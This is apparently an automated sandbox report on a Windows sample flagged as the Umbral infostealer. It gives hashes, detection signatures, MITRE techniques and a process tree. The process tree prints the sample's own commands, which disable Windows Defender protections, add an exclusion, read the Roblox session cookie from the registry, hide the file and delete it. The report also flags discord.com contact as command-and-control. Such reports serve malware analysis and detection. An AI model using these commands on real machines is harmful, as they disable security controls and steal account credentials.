Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
26-08-2024 20:24
Behavioral task
behavioral1
Sample
9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe
Resource
win7-20240705-en
General
-
Target
9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe
-
Size
234KB
-
MD5
18a5e3fd22133b48de0ac3ae4e41c997
-
SHA1
6664c80cf7567077385cc5f82aba04d525a7a8a9
-
SHA256
9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53
-
SHA512
c359ef3b9b5736b63e8906f6d35e6fb9b6f286f4fd382f5f445f2a5c9e38673a04f90215349c417c19e67cd9e123925521084167ac2dce0af842d18eb3c070b9
-
SSDEEP
6144:zloZM+rIkd8g+EtXHkv/iD4VsEnYe5xysXKYZd85Wn+l78e1mUDiM:xoZtL+EP8mEnYe5xysXKYZd85zJiM
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/1540-1-0x000001B99DE20000-0x000001B99DE60000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1756 powershell.exe 3232 powershell.exe 5096 powershell.exe 3556 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 discord.com 30 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 436 cmd.exe 4692 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1588 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4692 PING.EXE -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 1756 powershell.exe 1756 powershell.exe 1756 powershell.exe 5096 powershell.exe 5096 powershell.exe 5096 powershell.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe 3324 powershell.exe 3324 powershell.exe 3324 powershell.exe 3232 powershell.exe 3232 powershell.exe 3232 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe Token: SeIncreaseQuotaPrivilege 436 wmic.exe Token: SeSecurityPrivilege 436 wmic.exe Token: SeTakeOwnershipPrivilege 436 wmic.exe Token: SeLoadDriverPrivilege 436 wmic.exe Token: SeSystemProfilePrivilege 436 wmic.exe Token: SeSystemtimePrivilege 436 wmic.exe Token: SeProfSingleProcessPrivilege 436 wmic.exe Token: SeIncBasePriorityPrivilege 436 wmic.exe Token: SeCreatePagefilePrivilege 436 wmic.exe Token: SeBackupPrivilege 436 wmic.exe Token: SeRestorePrivilege 436 wmic.exe Token: SeShutdownPrivilege 436 wmic.exe Token: SeDebugPrivilege 436 wmic.exe Token: SeSystemEnvironmentPrivilege 436 wmic.exe Token: SeRemoteShutdownPrivilege 436 wmic.exe Token: SeUndockPrivilege 436 wmic.exe Token: SeManageVolumePrivilege 436 wmic.exe Token: 33 436 wmic.exe Token: 34 436 wmic.exe Token: 35 436 wmic.exe Token: 36 436 wmic.exe Token: SeIncreaseQuotaPrivilege 436 wmic.exe Token: SeSecurityPrivilege 436 wmic.exe Token: SeTakeOwnershipPrivilege 436 wmic.exe Token: SeLoadDriverPrivilege 436 wmic.exe Token: SeSystemProfilePrivilege 436 wmic.exe Token: SeSystemtimePrivilege 436 wmic.exe Token: SeProfSingleProcessPrivilege 436 wmic.exe Token: SeIncBasePriorityPrivilege 436 wmic.exe Token: SeCreatePagefilePrivilege 436 wmic.exe Token: SeBackupPrivilege 436 wmic.exe Token: SeRestorePrivilege 436 wmic.exe Token: SeShutdownPrivilege 436 wmic.exe Token: SeDebugPrivilege 436 wmic.exe Token: SeSystemEnvironmentPrivilege 436 wmic.exe Token: SeRemoteShutdownPrivilege 436 wmic.exe Token: SeUndockPrivilege 436 wmic.exe Token: SeManageVolumePrivilege 436 wmic.exe Token: 33 436 wmic.exe Token: 34 436 wmic.exe Token: 35 436 wmic.exe Token: 36 436 wmic.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeDebugPrivilege 3556 powershell.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeIncreaseQuotaPrivilege 3240 wmic.exe Token: SeSecurityPrivilege 3240 wmic.exe Token: SeTakeOwnershipPrivilege 3240 wmic.exe Token: SeLoadDriverPrivilege 3240 wmic.exe Token: SeSystemProfilePrivilege 3240 wmic.exe Token: SeSystemtimePrivilege 3240 wmic.exe Token: SeProfSingleProcessPrivilege 3240 wmic.exe Token: SeIncBasePriorityPrivilege 3240 wmic.exe Token: SeCreatePagefilePrivilege 3240 wmic.exe Token: SeBackupPrivilege 3240 wmic.exe Token: SeRestorePrivilege 3240 wmic.exe Token: SeShutdownPrivilege 3240 wmic.exe Token: SeDebugPrivilege 3240 wmic.exe Token: SeSystemEnvironmentPrivilege 3240 wmic.exe Token: SeRemoteShutdownPrivilege 3240 wmic.exe Token: SeUndockPrivilege 3240 wmic.exe Token: SeManageVolumePrivilege 3240 wmic.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 1540 wrote to memory of 436 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 92 PID 1540 wrote to memory of 436 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 92 PID 1540 wrote to memory of 2476 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 97 PID 1540 wrote to memory of 2476 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 97 PID 1540 wrote to memory of 1756 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 99 PID 1540 wrote to memory of 1756 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 99 PID 1540 wrote to memory of 5096 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 101 PID 1540 wrote to memory of 5096 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 101 PID 1540 wrote to memory of 3556 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 105 PID 1540 wrote to memory of 3556 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 105 PID 1540 wrote to memory of 3324 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 108 PID 1540 wrote to memory of 3324 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 108 PID 1540 wrote to memory of 3240 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 110 PID 1540 wrote to memory of 3240 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 110 PID 1540 wrote to memory of 772 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 113 PID 1540 wrote to memory of 772 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 113 PID 1540 wrote to memory of 3088 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 115 PID 1540 wrote to memory of 3088 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 115 PID 1540 wrote to memory of 3232 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 117 PID 1540 wrote to memory of 3232 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 117 PID 1540 wrote to memory of 1588 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 119 PID 1540 wrote to memory of 1588 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 119 PID 1540 wrote to memory of 436 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 122 PID 1540 wrote to memory of 436 1540 9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe 122 PID 436 wrote to memory of 4692 436 cmd.exe 124 PID 436 wrote to memory of 4692 436 cmd.exe 124 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2476 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe"C:\Users\Admin\AppData\Local\Temp\9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe"1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe"2⤵
- Views/modifies file attributes
PID:2476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1756
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵PID:772
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:3088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3232
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1588
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\9fa6035e3150c3e57724bd3f4f67647ed925c9c9447f00b3df7715d03b6ebf53.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4692
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4396,i,10597648459838880772,16562651767759956329,262144 --variations-seed-version --mojo-platform-channel-handle=4392 /prefetch:81⤵PID:1052
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
948B
MD51a58f982c18490e622e00d4eb75ace5a
SHA160c30527b74659ecf09089a5a7c02a1df9a71b65
SHA2564b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d
SHA512ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480
-
Filesize
1KB
MD588be3bc8a7f90e3953298c0fdbec4d72
SHA1f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA5124fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c
-
Filesize
1KB
MD5cd07d41354884d70dfa78bbb56fbc830
SHA1fdbf13029c34cd471ea502455cea9102cecd4e6d
SHA256b3a76ae9e5270debc38cd8ecf711683df3772ac8c04a8e4c551f97dc5e52ec79
SHA512c2b1975fe2cfe042aea3261f8293a5f9b6b401b68cf42c323c7ca32645bb06cc7bf6bb31d37bb37ef7bff0686017ae9e814e8e8370ea3d70a0091e0e1c0eafa7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82